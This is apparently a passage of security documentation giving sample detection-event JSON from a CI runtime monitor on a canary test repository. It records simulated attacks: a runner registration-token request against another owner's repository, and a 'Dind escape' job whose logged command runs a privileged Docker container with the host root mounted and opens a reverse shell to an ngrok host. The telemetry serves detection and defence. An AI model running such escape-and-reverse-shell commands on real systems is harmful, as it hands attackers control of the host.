"conclusion": "success",
"ref": "v4",
"number": 5,
"started_at": "2026-03-18T06:22:31.6344573Z",
"completed_at": "2026-03-18T06:22:32.8037126Z",
"starting_process_pid": "2935452",
"tools": [
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "PUT",
"host": "productionresultssa11.blob.core.windows.net",
"path": "/actions-results/8adaa2ed-028f-4d96-8c73-04a0f84583da/workflow-job-run-5068cffc-cd6c-567c-8307-64fcecbbad9f/logs/steps/step-logs-e7557a50-4ec4-4214-ba58-576a273cf39d.txt?se=2026-03-18T07%3A22%3A31Z&sig=***&ske=2026-03-18T08%3A57%3A28Z&skoid=***&sks=b&skt=2026-03-18T04%3A57%3A28Z&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skv=2025-11-05&sp=cw&spr=https&sr=b&st=2026-03-18T06%3A22%3A26Z&sv=2025-11-05",
"pid": "2934633",
"timestamp": "2026-03-18T06:22:31.83519375Z"
},
{
"method": "POST",
"host": "results-receiver.actions.githubusercontent.com",
"path": "/twirp/results.services.receiver.Receiver/CreateStepLogsMetadata",
"pid": "2934633",
"timestamp": "2026-03-18T06:22:31.958205192Z"
},
{
"method": "PUT",
"host": "productionresultssa11.blob.core.windows.net",
"path": "/actions-results/8adaa2ed-028f-4d96-8c73-04a0f84583da/workflow-job-run-5068cffc-cd6c-567c-8307-64fcecbbad9f/logs/steps/step-logs-3135d27d-c7e4-46cc-9291-110cce182246.txt?se=2026-03-18T07%3A22%3A32Z&sig=***&ske=2026-03-18T08%3A57%3A27Z&skoid=***&sks=b&skt=2026-03-18T04%3A57%3A27Z&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skv=2025-11-05&sp=cw&spr=https&sr=b&st=2026-03-18T06%3A22%3A27Z&sv=2025-11-05",
"pid": "2934633",
"timestamp": "2026-03-18T06:22:32.123686465Z"
}
]
},
{
"name": "git-remote-http",
"sha256": "git-remote-http",
"endpoints": [
{
"domainName": "github.com",
"friendlyName": "GitHub",
"port": "443",
"timestamp": "2026-03-18T06:22:32.160098091Z",
"pid": "2935627"
}
],
"https_endpoints": [
{
"method": "GET",
"host": "github.com",
"path": "/harden-runner-canary/rohan-playground/info/refs?service=git-upload-pack",
"pid": "2935627",
"timestamp": "2026-03-18T06:22:32.244221831Z"
}
]
}
]
},
{
"name": "Generate a registration token for attacker repo",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 6,
"started_at": "2026-03-18T06:22:32.8047126Z",
"completed_at": "2026-03-18T06:22:33.0598995Z",
"starting_process_pid": "2935828",
"tools": [
{
"name": "curl",
"sha256": "curl",
"endpoints": [
{
"domainName": "api.github.com",
"friendlyName": "GitHub",
"port": "443",
"timestamp": "2026-03-18T06:22:32.842003418Z",
"pid": "2935829"
}
],
"https_endpoints": [
{
"method": "POST",
"host": "api.github.com",
"path": "/repos/step-security-experiments/github-actions-goat/actions/runners/registration-token",
"pid": "2935829",
"timestamp": "2026-03-18T06:22:32.945785082Z",
"detection": {
"id": "SSD-3",
"name": "Write to different Owner",
"is_suppressed": false,
"tool": {
"name": "",
"sha256": "",
"parent": null
},
"is_resolved": false
}
}
]
}
]
},
{
"name": "Post Checkout",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 10,
"started_at": "2026-03-18T06:22:33.0608995Z",
"completed_at": "2026-03-18T06:22:33.6405099Z",
"starting_process_pid": "2935878",
"tools": [
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "PUT",
"host": "productionresultssa11.blob.core.windows.net",
"path": "/actions-results/8adaa2ed-028f-4d96-8c73-04a0f84583da/workflow-job-run-5068cffc-cd6c-567c-8307-64fcecbbad9f/logs/steps/step-logs-6f017457-0261-4f9a-bb5d-0c772b93b26c.txt?se=2026-03-18T07%3A22%3A33Z&sig=***&ske=2026-03-18T10%3A08%3A55Z&skoid=***&sks=b&skt=2026-03-18T06%3A08%3A55Z&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skv=2025-11-05&sp=cw&spr=https&sr=b&st=2026-03-18T06%3A22%3A28Z&sv=2025-11-05",
"pid": "2934633",
"timestamp": "2026-03-18T06:22:33.49286411Z"
}
]
}
]
},
{
"name": "Post Run step-security/harden-runner@rc-20-int",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 11,
"started_at": "2026-03-18T06:22:33.6415099Z",
"completed_at": "2026-03-18T06:22:33.8530027Z",
"starting_process_pid": "2936089",
"tools": [
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "PUT",
"host": "productionresultssa11.blob.core.windows.net",
"path": "/actions-results/8adaa2ed-028f-4d96-8c73-04a0f84583da/workflow-job-run-5068cffc-cd6c-567c-8307-64fcecbbad9f/logs/steps/step-logs-ffe21187-4e3d-4f1d-8ac8-00f5bfb80a1b.txt?se=2026-03-18T07%3A22%3A33Z&sig=***&ske=2026-03-18T08%3A57%3A23Z&skoid=***&sks=b&skt=2026-03-18T04%3A57%3A23Z&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skv=2025-11-05&sp=cw&spr=https&sr=b&st=2026-03-18T06%3A22%3A28Z&sv=2025-11-05",
"pid": "2934633",
"timestamp": "2026-03-18T06:22:33.819094845Z"
}
]
}
]
},
{
"name": "Complete runner",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 12,
"started_at": "2026-03-18T06:22:33.8540027Z",
"completed_at": "2026-03-18T06:22:34.1225042Z",
"starting_process_pid": "2936099",
"tools": [
{
"name": "curl",
"sha256": "",
"https_endpoints": [
{
"method": "GET",
"host": "int.api.stepsecurity.io",
"path": "/v1/github/harden-runner-canary/rohan-playground/actions/runs/23231936150/correlation/arc0-6l5vf-runner-vls69/job-markdown-summary?environment=ARC",
"pid": "2936100",
"timestamp": "2026-03-18T06:22:33.988166393Z"
},
{
"method": "PUT",
"host": "productionresultssa11.blob.core.windows.net",
"path": "/actions-results/8adaa2ed-028f-4d96-8c73-04a0f84583da/workflow-job-run-5068cffc-cd6c-567c-8307-64fcecbbad9f/logs/steps/step-logs-13fb33d5-6154-4b4c-8da9-8ca87fd32d26.txt?se=2026-03-18T07%3A22%3A34Z&sig=***&ske=2026-03-18T08%3A58%3A29Z&skoid=***&sks=b&skt=2026-03-18T04%3A58%3A29Z&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skv=2025-11-05&sp=cw&spr=https&sr=b&st=2026-03-18T06%3A22%3A29Z&sv=2025-11-05",
"pid": "2934633",
"timestamp": "2026-03-18T06:22:34.092286485Z"
}
]
}
]
},
{
"name": "Complete job",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 13,
"started_at": "2026-03-18T06:22:34.1235042Z",
"completed_at": "2026-03-18T06:22:34.128868Z"
}
],
"is_sudo_process": false,
"is_sudo_feature_enabled": false,
"runner_name": "arc0-6l5vf-runner-vls69",
"runner_machine_group": "default",
"runner_machine_name": "arc0-6l5vf-runner-vls69",
"harden_runner_egress_policy": "audit",
"harden_runner_disable_telemetry": "false",
"harden_runner_disable_file_monitoring": "false",
"cluster_name": "rohan-test-v5",
"environment_type": "ARC",
"has_raw_file_events": true,
"has_raw_process_events": true,
"raw_file_events_key": "correlate_runs/harden-runner-canary/rohan-playground/23231936150-events/67527154577/file_events.json",
"raw_process_events_key": "correlate_runs/harden-runner-canary/rohan-playground/23231936150-events/67527154577/process_events.json",
"raw_events_bucket": "customer-raw-events-data-277233109775",
"actions_info": [
{
"action": "step-security/harden-runner",
"tag": "rc-20-int",
"sha": "b458cf61e24e167c05a441dec5234b240974af45",
"timestamp": "1773814949",
"is_imposter_commit": false,
"is_commit_on_default_branch": false
},
{
"action": "actions/checkout",
"tag": "v4",
"sha": "34e114876b0b11c390a56381ad16ebd13914f8d5",
"timestamp": "1773814949",
"is_imposter_commit": false,
"is_commit_on_default_branch": false
}
],
"suspicious_processes_control_enabled": true,
"labels": [
"arc0"
],
"runner_group_name": "default",
"runner_group_id": 1,
"correlation_id": "arc0-6l5vf-runner-vls69"
},
{
"id": 67527154639,
"run_id": 23231936150,
"html_url": "https://github.com/harden-runner-canary/rohan-playground/actions/runs/23231936150/job/67527154639",
"status": "completed",
"conclusion": "failure",
"started_at": "2026-03-18T06:22:38Z",
"completed_at": "2026-03-18T06:22:55Z",
"name": "privileged-conatiner",
"steps": [
{
"name": "Set up job",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 1,
"started_at": "2026-03-18T06:22:40.1508673Z",
"completed_at": "2026-03-18T06:22:42.5129726Z",
"tools": [
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "GET",
"host": "results-receiver.actions.githubusercontent.com",
"path": "/_ws/ingest.sock",
"pid": "2936277",
"timestamp": "2026-03-18T06:22:40.528738399Z"
},
{
"method": "POST",
"host": "launch.actions.githubusercontent.com",
"path": "/actions/build/8adaa2ed-028f-4d96-8c73-04a0f84583da/jobs/eb11e5fa-c091-5953-9431-b93a82ea0a6a/runnerresolve/actions",
"pid": "2936277",
"timestamp": "2026-03-18T06:22:40.530227099Z"
},
{
"method": "POST",
"host": "results-receiver.actions.githubusercontent.com",
"path": "/twirp/github.actions.results.api.v1.WorkflowStepUpdateService/WorkflowStepsUpdate",
"pid": "2936277",
"timestamp": "2026-03-18T06:22:40.745368179Z"
},
{
"method": "GET",
"host": "api.github.com",
"path": "/repos/step-security/harden-runner/tarball/b458cf61e24e167c05a441dec5234b240974af45",
"pid": "2936277",
"timestamp": "2026-03-18T06:22:40.82399861Z"
},
{
"method": "GET",
"host": "codeload.github.com",
"path": "/step-security/harden-runner/legacy.tar.gz/b458cf61e24e167c05a441dec5234b240974af45",
"pid": "2936277",
"timestamp": "2026-03-18T06:22:41.058899403Z"
}
]
},
{
"name": "/home/runner/bin/Runner.Worker",
"sha256": "/home/runner/bin/Runner.Worker",
"endpoints": [
{
"domainName": "api.github.com",
"friendlyName": "GitHub",
"port": "443",
"timestamp": "2026-03-18T06:22:40.790881972Z",
"pid": "2936277"
}
]
}
]
},
{
"name": "Set up runner",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 2,
"started_at": "2026-03-18T06:22:42.5139726Z",
"completed_at": "2026-03-18T06:22:42.8059323Z",
"starting_process_pid": "2936741",
"tools": [
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "GET",
"host": "token.actions.githubusercontent.com",
"path": "/ready",
"pid": "2936277",
"timestamp": "2026-03-18T06:22:42.613043799Z"
},
{
"method": "GET",
"host": "broker.actions.githubusercontent.com",
"path": "/health",
"pid": "2936277",
"timestamp": "2026-03-18T06:22:42.651364105Z"
},
{
"method": "GET",
"host": "run.actions.githubusercontent.com",
"path": "/health",
"pid": "2936277",
"timestamp": "2026-03-18T06:22:42.666987971Z"
},
{
"method": "GET",
"host": "int.api.stepsecurity.io",
"path": "/v1/github/harden-runner-canary/rohan-playground/actions/policies/workflow-check?workflow=poc_workflow.yml&run_id=23231936150&correlationId=***",
"pid": "2936745",
"timestamp": "2026-03-18T06:22:42.671565994Z"
}
]
}
]
},
{
"name": "Pre Run step-security/harden-runner@rc-20-int",
"action": "step-security/harden-runner",
"status": "completed",
"conclusion": "success",
"ref": "rc-20-int",
"number": 3,
"started_at": "2026-03-18T06:22:42.8069323Z",
"completed_at": "2026-03-18T06:22:43.7040075Z",
"tools": [
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "POST",
"host": "results-receiver.actions.githubusercontent.com",
"path": "/twirp/results.services.receiver.Receiver/GetStepLogsSignedBlobURL",
"pid": "2936277",
"timestamp": "2026-03-18T06:22:43.08402999Z"
},
{
"method": "PUT",
"host": "productionresultssa11.blob.core.windows.net",
"path": "/actions-results/8adaa2ed-028f-4d96-8c73-04a0f84583da/workflow-job-run-eb11e5fa-c091-5953-9431-b93a82ea0a6a/logs/steps/step-logs-857547ec-bd16-4e9c-bd2c-fe93b8ffe959.txt?se=2026-03-18T07%3A22%3A43Z&sig=***&ske=2026-03-18T08%3A58%3A08Z&skoid=***&sks=b&skt=2026-03-18T04%3A58%3A08Z&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skv=2025-11-05&sp=cw&spr=https&sr=b&st=2026-03-18T06%3A22%3A38Z&sv=2025-11-05",
"pid": "2936277",
"timestamp": "2026-03-18T06:22:43.589302156Z"
}
]
}
]
},
{
"name": "Run step-security/harden-runner@rc-20-int",
"action": "step-security/harden-runner",
"status": "completed",
"conclusion": "success",
"ref": "rc-20-int",
"number": 4,
"started_at": "2026-03-18T06:22:43.7050075Z",
"completed_at": "2026-03-18T06:22:44.0639925Z",
"starting_process_pid": "2936776",
"tools": [
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "POST",
"host": "results-receiver.actions.githubusercontent.com",
"path": "/twirp/results.services.receiver.Receiver/CreateStepLogsMetadata",
"pid": "2936277",
"timestamp": "2026-03-18T06:22:43.735658943Z"
}
]
}
]
},
{
"name": "Dind escape",
"status": "completed",
"conclusion": "failure",
"ref": "",
"number": 5,
"started_at": "2026-03-18T06:22:44.0649925Z",
"completed_at": "2026-03-18T06:22:52.6071092Z",
"starting_process_pid": "2936783",
"tools": [
{
"name": "/usr/local/bin/dockerd",
"sha256": "/usr/local/bin/dockerd",
"endpoints": [
{
"domainName": "registry-1.docker.io",
"friendlyName": "DockerHub",
"port": "443",
"timestamp": "2026-03-18T06:22:44.577288799Z",
"pid": "2935007"
},
{
"domainName": "auth.docker.io",
"friendlyName": "DockerHub",
"port": "443",
"timestamp": "2026-03-18T06:22:44.850808261Z",
"pid": "2935007"
},
{
"domainName": "production.cloudflare.docker.com",
"friendlyName": "DockerHub",
"port": "443",
"timestamp": "2026-03-18T06:22:45.668531277Z",
"pid": "2935007"
}
],
"https_endpoints": [
{
"method": "HEAD",
"host": "registry-1.docker.io",
"path": "/v2/raesene/ncat/manifests/latest",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:44.764294734Z"
},
{
"method": "GET",
"host": "auth.docker.io",
"path": "/token?scope=***&service=registry.docker.io",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:44.886265173Z"
},
{
"method": "GET",
"host": "registry-1.docker.io",
"path": "/v2/raesene/ncat/manifests/sha256:3e4af0d54f983ad9a9c72db8a33d33a306e46fd217067d3a7df43133e017b695",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:45.339307723Z"
},
{
"method": "GET",
"host": "registry-1.docker.io",
"path": "/v2/raesene/ncat/blobs/sha256:bae850c8365a7ebfedb26be9f5fe0335bb67208a0f8f21cd4f3ae3137035814b",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:45.594584345Z"
},
{
"method": "GET",
"host": "production.cloudflare.docker.com",
"path": "/registry-v2/docker/registry/v2/blobs/sha256/ba/bae850c8365a7ebfedb26be9f5fe0335bb67208a0f8f21cd4f3ae3137035814b/data?expires=1773817965&signature=***&version=3",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:45.688979953Z"
},
{
"method": "GET",
"host": "registry-1.docker.io",
"path": "/v2/raesene/ncat/blobs/sha256:344da5c95cecd0f55238ce59b8469ee301056001ece2b769e9691b80f94f9f37",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:45.947229001Z"
},
{
"method": "GET",
"host": "production.cloudflare.docker.com",
"path": "/registry-v2/docker/registry/v2/blobs/sha256/34/344da5c95cecd0f55238ce59b8469ee301056001ece2b769e9691b80f94f9f37/data?expires=1773817965&signature=***&version=3",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:46.034350835Z"
},
{
"method": "GET",
"host": "registry-1.docker.io",
"path": "/v2/raesene/ncat/blobs/sha256:8f0c935b273972ae5b4aec4639168661b527d23843714fa2625cf4f36e572300",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:46.034470759Z"
},
{
"method": "GET",
"host": "production.cloudflare.docker.com",
"path": "/registry-v2/docker/registry/v2/blobs/sha256/8f/8f0c935b273972ae5b4aec4639168661b527d23843714fa2625cf4f36e572300/data?expires=1773817966&signature=***&version=3",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:46.101556253Z"
},
{
"method": "GET",
"host": "registry-1.docker.io",
"path": "/v2/raesene/ncat/blobs/sha256:7413c47ba209e555018c4be91101d017737f24b0c9d1f65339b97a4da98acb2a",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:46.10184111Z"
},
{
"method": "GET",
"host": "registry-1.docker.io",
"path": "/v2/raesene/ncat/blobs/sha256:1d425c98234572d4221a1ac173162c4279f9fdde4726ec22ad3c399f59bb7503",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:46.153797267Z"
},
{
"method": "GET",
"host": "production.cloudflare.docker.com",
"path": "/registry-v2/docker/registry/v2/blobs/sha256/74/7413c47ba209e555018c4be91101d017737f24b0c9d1f65339b97a4da98acb2a/data?expires=1773817966&signature=***&version=3",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:46.223541316Z"
},
{
"method": "GET",
"host": "production.cloudflare.docker.com",
"path": "/registry-v2/docker/registry/v2/blobs/sha256/1d/1d425c98234572d4221a1ac173162c4279f9fdde4726ec22ad3c399f59bb7503/data?expires=1773817966&signature=***&version=3",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:46.230662665Z"
},
{
"method": "GET",
"host": "registry-1.docker.io",
"path": "/v2/raesene/ncat/blobs/sha256:0fe7e7cbb2e88617d969efeeb3bd3125f7d309335c736a0525233ec2dc06aee1",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:46.30024992Z"
},
{
"method": "GET",
"host": "production.cloudflare.docker.com",
"path": "/registry-v2/docker/registry/v2/blobs/sha256/0f/0fe7e7cbb2e88617d969efeeb3bd3125f7d309335c736a0525233ec2dc06aee1/data?expires=1773817966&signature=***&version=3",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:46.363586139Z"
},
{
"method": "GET",
"host": "registry-1.docker.io",
"path": "/v2/raesene/ncat/blobs/sha256:c350f1c05bf382af464a9197413392c37da33b3d9005c69ffbc345ba38e9eaf1",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:46.38814184Z"
},
{
"method": "GET",
"host": "production.cloudflare.docker.com",
"path": "/registry-v2/docker/registry/v2/blobs/sha256/c3/c350f1c05bf382af464a9197413392c37da33b3d9005c69ffbc345ba38e9eaf1/data?expires=1773817966&signature=***&version=3",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:46.448524438Z"
},
{
"method": "GET",
"host": "registry-1.docker.io",
"path": "/v2/raesene/ncat/blobs/sha256:845e36a4c33cd5d504211f37b510056bd116b372bb99f57d73f66e12a8afcb62",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:46.515633169Z"
},
{
"method": "GET",
"host": "production.cloudflare.docker.com",
"path": "/registry-v2/docker/registry/v2/blobs/sha256/84/845e36a4c33cd5d504211f37b510056bd116b372bb99f57d73f66e12a8afcb62/data?expires=1773817966&signature=***&version=3",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:46.588643258Z"
},
{
"method": "GET",
"host": "registry-1.docker.io",
"path": "/v2/raesene/ncat/blobs/sha256:099596d39785e52283684a12ca11d34fdd0bc9ccd001faa3be56102acec1d7d2",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:46.593547789Z"
},
{
"method": "GET",
"host": "production.cloudflare.docker.com",
"path": "/registry-v2/docker/registry/v2/blobs/sha256/09/099596d39785e52283684a12ca11d34fdd0bc9ccd001faa3be56102acec1d7d2/data?expires=1773817966&signature=***&version=3",
"pid": "2935007",
"timestamp": "2026-03-18T06:22:46.654360227Z"
}
]
},
{
"name": "ncat",
"sha256": "ncat",
"endpoints": [
{
"domainName": "0.tcp.us-cal-1.ngrok.io",
"port": "17658",
"timestamp": "2026-03-18T06:22:52.140005134Z",
"pid": "2937745"
}
]
},
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "PUT",
"host": "productionresultssa11.blob.core.windows.net",
"path": "/actions-results/8adaa2ed-028f-4d96-8c73-04a0f84583da/workflow-job-run-eb11e5fa-c091-5953-9431-b93a82ea0a6a/logs/steps/step-logs-f2baf51a-5719-40ba-b762-e267ead68b08.txt?se=2026-03-18T07%3A22%3A44Z&sig=***&ske=2026-03-18T08%3A57%3A24Z&skoid=***&sks=b&skt=2026-03-18T04%3A57%3A24Z&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skv=2025-11-05&sp=cw&spr=https&sr=b&st=2026-03-18T06%3A22%3A39Z&sv=2025-11-05",
"pid": "2936277",
"timestamp": "2026-03-18T06:22:44.107275081Z"
},
{
"method": "PUT",
"host": "productionresultssa11.blob.core.windows.net",
"path": "/actions-results/8adaa2ed-028f-4d96-8c73-04a0f84583da/workflow-job-run-eb11e5fa-c091-5953-9431-b93a82ea0a6a/logs/steps/step-logs-3f28806d-cb7b-4044-bb2b-ec4ffc51b5de.txt?se=2026-03-18T07%3A22%3A45Z&sig=***&ske=2026-03-18T08%3A57%3A41Z&skoid=***&sks=b&skt=2026-03-18T04%3A57%3A41Z&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skv=2025-11-05&sp=cw&spr=https&sr=b&st=2026-03-18T06%3A22%3A40Z&sv=2025-11-05",
"pid": "2936277",
"timestamp": "2026-03-18T06:22:45.571408152Z"
},
{
"method": "PUT",
"host": "productionresultssa11.blob.core.windows.net",
"path": "/actions-results/8adaa2ed-028f-4d96-8c73-04a0f84583da/workflow-job-run-eb11e5fa-c091-5953-9431-b93a82ea0a6a/logs/steps/step-logs-8b0d532d-43a1-4a44-b168-993069099ae3.txt?se=2026-03-18T07%3A22%3A45Z&sig=***&ske=2026-03-18T08%3A58%3A13Z&skoid=***&sks=b&skt=2026-03-18T04%3A58%3A13Z&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skv=2025-11-05&sp=cw&spr=https&sr=b&st=2026-03-18T06%3A22%3A40Z&sv=2025-11-05",
"pid": "2936277",
"timestamp": "2026-03-18T06:22:46.033069491Z"
}
]
}
]
},
{
"name": "Post Run step-security/harden-runner@rc-20-int",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 9,
"started_at": "2026-03-18T06:22:52.6081092Z",
"completed_at": "2026-03-18T06:22:52.736481Z",
"starting_process_pid": "2938194"
},
{
"name": "Complete runner",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 10,
"started_at": "2026-03-18T06:22:52.737481Z",
"completed_at": "2026-03-18T06:22:52.9192534Z",
"starting_process_pid": "2938226",
"tools": [
{
"name": "curl",
"sha256": "",
"https_endpoints": [
{
"method": "GET",
"host": "int.api.stepsecurity.io",
"path": "/v1/github/harden-runner-canary/rohan-playground/actions/runs/23231936150/correlation/arc0-6l5vf-runner-2gtpg/job-markdown-summary?environment=ARC",
"pid": "2938227",
"timestamp": "2026-03-18T06:22:52.794190125Z"
}
]
}
]
},
{
"name": "Complete job",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 11,
"started_at": "2026-03-18T06:22:52.9202534Z",
"completed_at": "2026-03-18T06:22:52.9267803Z"
}
],
"is_sudo_process": false,
"is_sudo_feature_enabled": false,
"runner_name": "arc0-6l5vf-runner-2gtpg",
"runner_machine_group": "default",
"runner_machine_name": "arc0-6l5vf-runner-2gtpg",
"harden_runner_egress_policy": "audit",
"harden_runner_disable_telemetry": "false",
"harden_runner_disable_file_monitoring": "false",
"cluster_name": "rohan-test-v5",
"environment_type": "ARC",
"has_raw_file_events": true,
"has_raw_process_events": true,
"raw_file_events_key": "correlate_runs/harden-runner-canary/rohan-playground/23231936150-events/67527154639/file_events.json",
"raw_process_events_key": "correlate_runs/harden-runner-canary/rohan-playground/23231936150-events/67527154639/process_events.json",
"raw_events_bucket": "customer-raw-events-data-277233109775",
"actions_info": [
{
"action": "step-security/harden-runner",
"tag": "rc-20-int",
"sha": "b458cf61e24e167c05a441dec5234b240974af45",
"timestamp": "1773814960",
"is_imposter_commit": false,
"is_commit_on_default_branch": false
}
],
"suspicious_processes_control_enabled": true,
"suspicious_processes": {
"privilegedContainerProcesses": [
{
"pid": "2936784",
"ppid": "2936783",
"exe": "/usr/bin/docker",
"working_directory": "/home/runner/_work/rohan-playground/rohan-playground",
"arguments": [
"run --privileged --cap-add=ALL -v /:/host raesene/ncat:latest 0.tcp.us-cal-1.ngrok.io 17658 -e /bin/bash"
],
"timestamp": "2026-03-18T06:22:44.074767832Z"
}
]
},
"labels": [
"arc0"
],
"runner_group_name": "default",
"runner_group_id": 1,
"correlation_id": "arc0-6l5vf-runner-2gtpg"
}
],
"installed_on_repo": true,
"workflow_run_created_at": "2026-03-18T06:21:59Z",
"workflow_run_updated_at": "2026-03-18T06:22:56Z",
"workflow_run_started_at": "2026-03-18T06:21:59Z",
"workflow_run_actor_login": "rohan-stepsecurity",
"workflow_file_name": "poc_workflow.yml",
"is_stored_in_s3": true,
"s3_key": "correlate_runs/harden-runner-canary/rohan-playground/23231936150",
"organization_name": "harden-runner-canary",
"repository_name": "rohan-playground",
"repo_workflow": "repo#harden-runner-canary/rohan-playground#workflow#poc_workflow.yml",
"is_harden_runner_enabled": true,
"secrets_detected_count": 1,
"imposter_commits_count": 1,
"destination_count": 6,
"action_count": 3,
"https_events_count": 97,
"https_detections_count": 1,
"job_count": 6,
"jobs_monitored_count": 6,
"run_attempt": 1
}
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://docs.stepsecurity.io/admin-console/integrations/sample-detection-events.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.